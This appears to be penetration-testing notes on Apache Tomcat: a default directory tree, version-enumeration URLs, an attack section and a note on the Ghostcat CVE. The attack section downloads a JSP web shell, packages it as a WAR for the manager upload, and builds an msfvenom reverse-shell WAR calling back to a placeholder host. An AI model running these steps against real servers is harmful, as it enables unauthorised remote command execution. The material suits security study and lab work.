Tomcat

Web Server.

Apache Tomcat is an open-source web server that hosts applications written in Java.

Default File Structure

/opt/tomcat/  (Tomcat installation directory)
├── bin/          (Startup, shutdown, and management scripts)
│   ├── catalina.sh  (Main control script for Tomcat)
│   ├── startup.sh   (Starts Tomcat)
│   ├── shutdown.sh  (Stops Tomcat)
│   ├── setenv.sh    (Optional, sets environment variables)
│   ├── digest.sh    (Generates hashed passwords)
│   ├── version.sh   (Shows Tomcat version)
│   ├── tool-wrapper.sh  (Helper script for Java tools)
│   ├── tomcat-juli.jar  (Tomcat logging utility)
│   ├── *.bat  (Windows equivalent of shell scripts)
├── conf/         (Configuration files)
│   ├── server.xml        (Main configuration file)
│   ├── web.xml           (Default web application settings)
│   ├── tomcat-users.xml  (User roles and authentication)
│   ├── tomcat-users.xsd  (XML schema definition for `tomcat-users.xml`)
│   ├── logging.properties (Logging configuration)
│   ├── catalina.policy   (Security policy for Java permissions)
│   ├── catalina.properties (JVM properties)
│   ├── context.xml       (Default context settings)
│   ├── jaspic-providers.xml (Java Authentication configuration)
│   ├── jaas.config       (Java Authentication and Authorization Service)
├── lib/          (Core Tomcat libraries)
│   ├── servlet-api.jar  (Servlet API)
│   ├── tomcat-api.jar   (Tomcat core API)
│   ├── tomcat-util.jar  (Utility classes)
│   ├── ecj-*.jar        (Eclipse Compiler for JSP)
│   ├── jsp-api.jar      (JSP API)
│   ├── websocket-api.jar (WebSocket API)
│   ├── *.jar            (Additional dependencies)
├── logs/         (Log files)
│   ├── catalina.out    (Main log file)
│   ├── localhost.log   (Logs specific to the localhost container)
│   ├── manager.log     (Logs for Tomcat Manager application)
│   ├── host-manager.log (Logs for Host Manager application)
│   ├── *.log           (Other logs)
├── temp/         (Temporary files)
│   ├── tomcat.*        (Temporary data storage for Tomcat)
├── webapps/      (Deployed applications)
│   ├── ROOT/         (Default root application)
│   │   ├── index.jsp  (Default welcome page)
│   │   ├── WEB-INF/   (Configuration files for the app)
│   ├── manager/      (Tomcat Manager Web UI)
│   │   ├── images/      (Icons and graphics for the UI)
│   │   ├── META-INF/    (Metadata and security settings)
│   │   └── WEB-INF/     (Application configurations)
│   │       ├── web.xml  (Defines servlet settings for the Manager app)
│   ├── host-manager/ (Tomcat Virtual Host Manager)
│   ├── docs/        (Tomcat documentation)
│   ├── examples/    (Example applications)
│   ├── myapp.war    (Custom deployed application - .war file)
│   ├── <CUSTOMAPP>/   (Custom web application)
│   │   ├── images/      (Custom app images)
│   │   ├── index.jsp    (Main entry point of the app)
│   │   ├── META-INF/
│   │   │   └── context.xml  (Application-specific context configuration)
│   │   ├── status.xsd   (XML Schema for status validation)
│   │   └── WEB-INF/
│   │       ├── jsp/
│   │       │   └── admin.jsp   (Admin page JSP)
│   │       ├── lib/
│   │       │   └── jdbc_drivers.jar   (Database driver)
│   │       ├── classes/
│   │       │   └── AdminServlet.class  (Compiled Servlet for Admin)
│   │       └── web.xml    (<--- Defines servlet settings for customapp)
├── work/         (Compiled JSP files and runtime data)
│   ├── Catalina/   (Compiled Java files for JSPs)
│   │   ├── localhost/
│   │   │   ├── _ (Default webapp compilation)
│   │   │   ├── myapp/ (Compiled JSPs for a deployed application)
└── LICENSE       (License information)
└── NOTICE        (Legal notices)
└── RELEASE-NOTES (Release notes)

Manual Enumeration

Version

Error Page	http://<DOMAIN>:<PORT>/invalid
/docs	http://<DOMAIN>:<PORT>/docs/ | grep Tomcat

Attacks

Many Tomcat installations provide a GUI interface to manage the application. This interface is available at /manager/html by default, which only users assigned the manager-gui role are allowed to access. Valid manager credentials can be used to upload a packaged Tomcat application (.WAR file) and compromise the application. A WAR, or Web Application Archive, is used to quickly deploy web applications and backup storage.

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp 

Click on Browse to select the .war file and then click on Deploy. This file is uploaded to the manager GUI, after which the /backup application will be added to the table. If we click on backup, we will get redirected to http://<DOMAIN>:<PORT>/backup/. We need to specify the cmd.jsp file in the URL to get us with a web shell.

We can also use msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > backup.war

CVE

CVE-2020-1938	Ghostcat Unauthenticated LFI in all Tomcat versions before 9.0.31, 8.5.51, and 7.0.100. The exploit can only read files and folders within the web apps folder.